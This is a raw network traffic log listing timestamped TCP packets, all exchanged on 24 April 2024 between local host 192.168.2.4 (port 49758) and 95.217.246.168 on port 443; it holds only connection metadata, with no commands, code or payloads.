Apr 24, 2024 16:49:11.366452932 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.366478920 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:12.020191908 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:12.020339012 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:12.020843029 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:12.020849943 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:12.020977974 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:12.020982981 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:13.043543100 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:13.043581009 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:13.043597937 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:13.043670893 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:13.043730021 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:13.043736935 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:13.043848038 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:21.096148014 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.096163034 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.096219063 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.096404076 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:21.096412897 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.096520901 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:21.302248955 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.302310944 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.302375078 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:21.302401066 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:21.302503109 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:21.302503109 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.136774063 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.136787891 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.136918068 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.137063980 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.137063980 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.137079954 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.137202978 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.438579082 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.438594103 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.438668013 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.438678026 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.438694000 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.438760996 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.550185919 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.550208092 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.550329924 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.550339937 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.550524950 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.871133089 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.871144056 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.871186018 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.871330976 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.871330976 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:22.871340990 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:22.871386051 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.216095924 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.216119051 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.216150045 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.216229916 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.216240883 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.216294050 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.216294050 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.561495066 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.561502934 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.561543941 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.561639071 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.561654091 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.561703920 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.561703920 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.906949043 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.906965017 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.907001019 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.907063007 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:23.907078028 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:23.907140970 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.253067017 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.253103971 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.253182888 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.253259897 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.253259897 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.253273010 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.253393888 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.534928083 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.534965038 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.535036087 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.535044909 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.535063982 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.535075903 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.535115957 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.535131931 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.803170919 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.803186893 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.803250074 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.803306103 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.803318024 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:24.803344965 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:24.803385973 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.019047976 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.019058943 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.019102097 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.019256115 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.019268990 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.019332886 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.019448042 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.238732100 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.238742113 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.238778114 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.238823891 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.238836050 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.238874912 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.238874912 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.439626932 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.439654112 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.439949989 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.439963102 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.440120935 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.623735905 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.623765945 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.623836994 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.623843908 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.623855114 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.623881102 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.797019005 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.797041893 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.797127008 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.797127008 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.797135115 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.797352076 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.961683989 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.961710930 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.961745024 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:25.961751938 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:25.961787939 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.108674049 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.108695984 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.108912945 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.108931065 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.109008074 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.240894079 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.240920067 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.240974903 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.240992069 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.241058111 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.241092920 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.376554966 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.376624107 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.376698971 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.376713037 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.376722097 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.376791954 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.504853010 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.504877090 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.504950047 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.504981041 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.505250931 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.626405001 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.626430988 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.626626968 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.626646042 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.626872063 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.741875887 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.741899014 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.742084980 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.742095947 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.742439032 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.852494001 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.852523088 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.852756023 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.852770090 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.852839947 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.950484037 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.950506926 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.950647116 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:26.950659990 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:26.951493025 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.051945925 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.051970005 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.052020073 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.052031040 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.052120924 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.054961920 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.142401934 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.142425060 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.142589092 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.142602921 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.143116951 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.240535021 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.240557909 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.240755081 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.240768909 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.241075993 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.322086096 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.322109938 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.322448015 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.322473049 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.322570086 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.407430887 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.407455921 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.407593012 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.407610893 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.408179998 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.496541023 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.496562004 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.496663094 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.496676922 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.497076035 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.571252108 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.571268082 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.571394920 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.571405888 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.571801901 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.643423080 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.643444061 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.643487930 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.643497944 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.643528938 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.643579960 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.726588964 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.726609945 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.726699114 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.726730108 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.726738930 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.726807117 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.796545982 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.796571016 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.796662092 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.796672106 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.797195911 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.861517906 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.861535072 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.861603975 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.861613989 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.861982107 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.935384035 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.935406923 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.935652971 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:27.935667038 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:27.935729027 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.001910925 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.001933098 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.002208948 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.002221107 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.002399921 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.067833900 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.067852020 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.067914009 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.067922115 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.067972898 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.127852917 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.127873898 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.127973080 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.127985954 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.128443956 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.199022055 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.199045897 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.199140072 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.199157000 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.199193954 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.199193954 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.250428915 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.250458956 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.250648022 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.250664949 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.250754118 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.302664995 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.302683115 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.302795887 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.302805901 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.302855968 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.362656116 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.362700939 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.362854004 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.362864971 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.362972975 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.362972975 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.427587032 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.427634001 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.427697897 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.427709103 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.427732944 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.427769899 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.469139099 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.469199896 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.469254971 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.469264984 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.469305038 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.469331026 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.518234015 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.518285036 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.518579960 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.518589973 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.518795013 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.574527025 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.574585915 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.574724913 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.574724913 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.574733973 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.574769974 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.621551037 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.621594906 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.622124910 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.622136116 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.622168064 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.622231960 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.671475887 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.671519041 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.671555996 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.671561956 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.671612978 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.725611925 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.725658894 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.725740910 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.725740910 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.725765944 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.725802898 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.768809080 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.768857956 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.768879890 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.768902063 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.768922091 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.768945932 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.768945932 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.812290907 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.812336922 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.812366009 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.812374115 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.812414885 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.812414885 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.858670950 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.858690023 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.858767033 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.858792067 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.858879089 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:28.907505035 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.907566071 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:28.907740116 CEST	49758	443	192.168.2.4	95.217.246.168
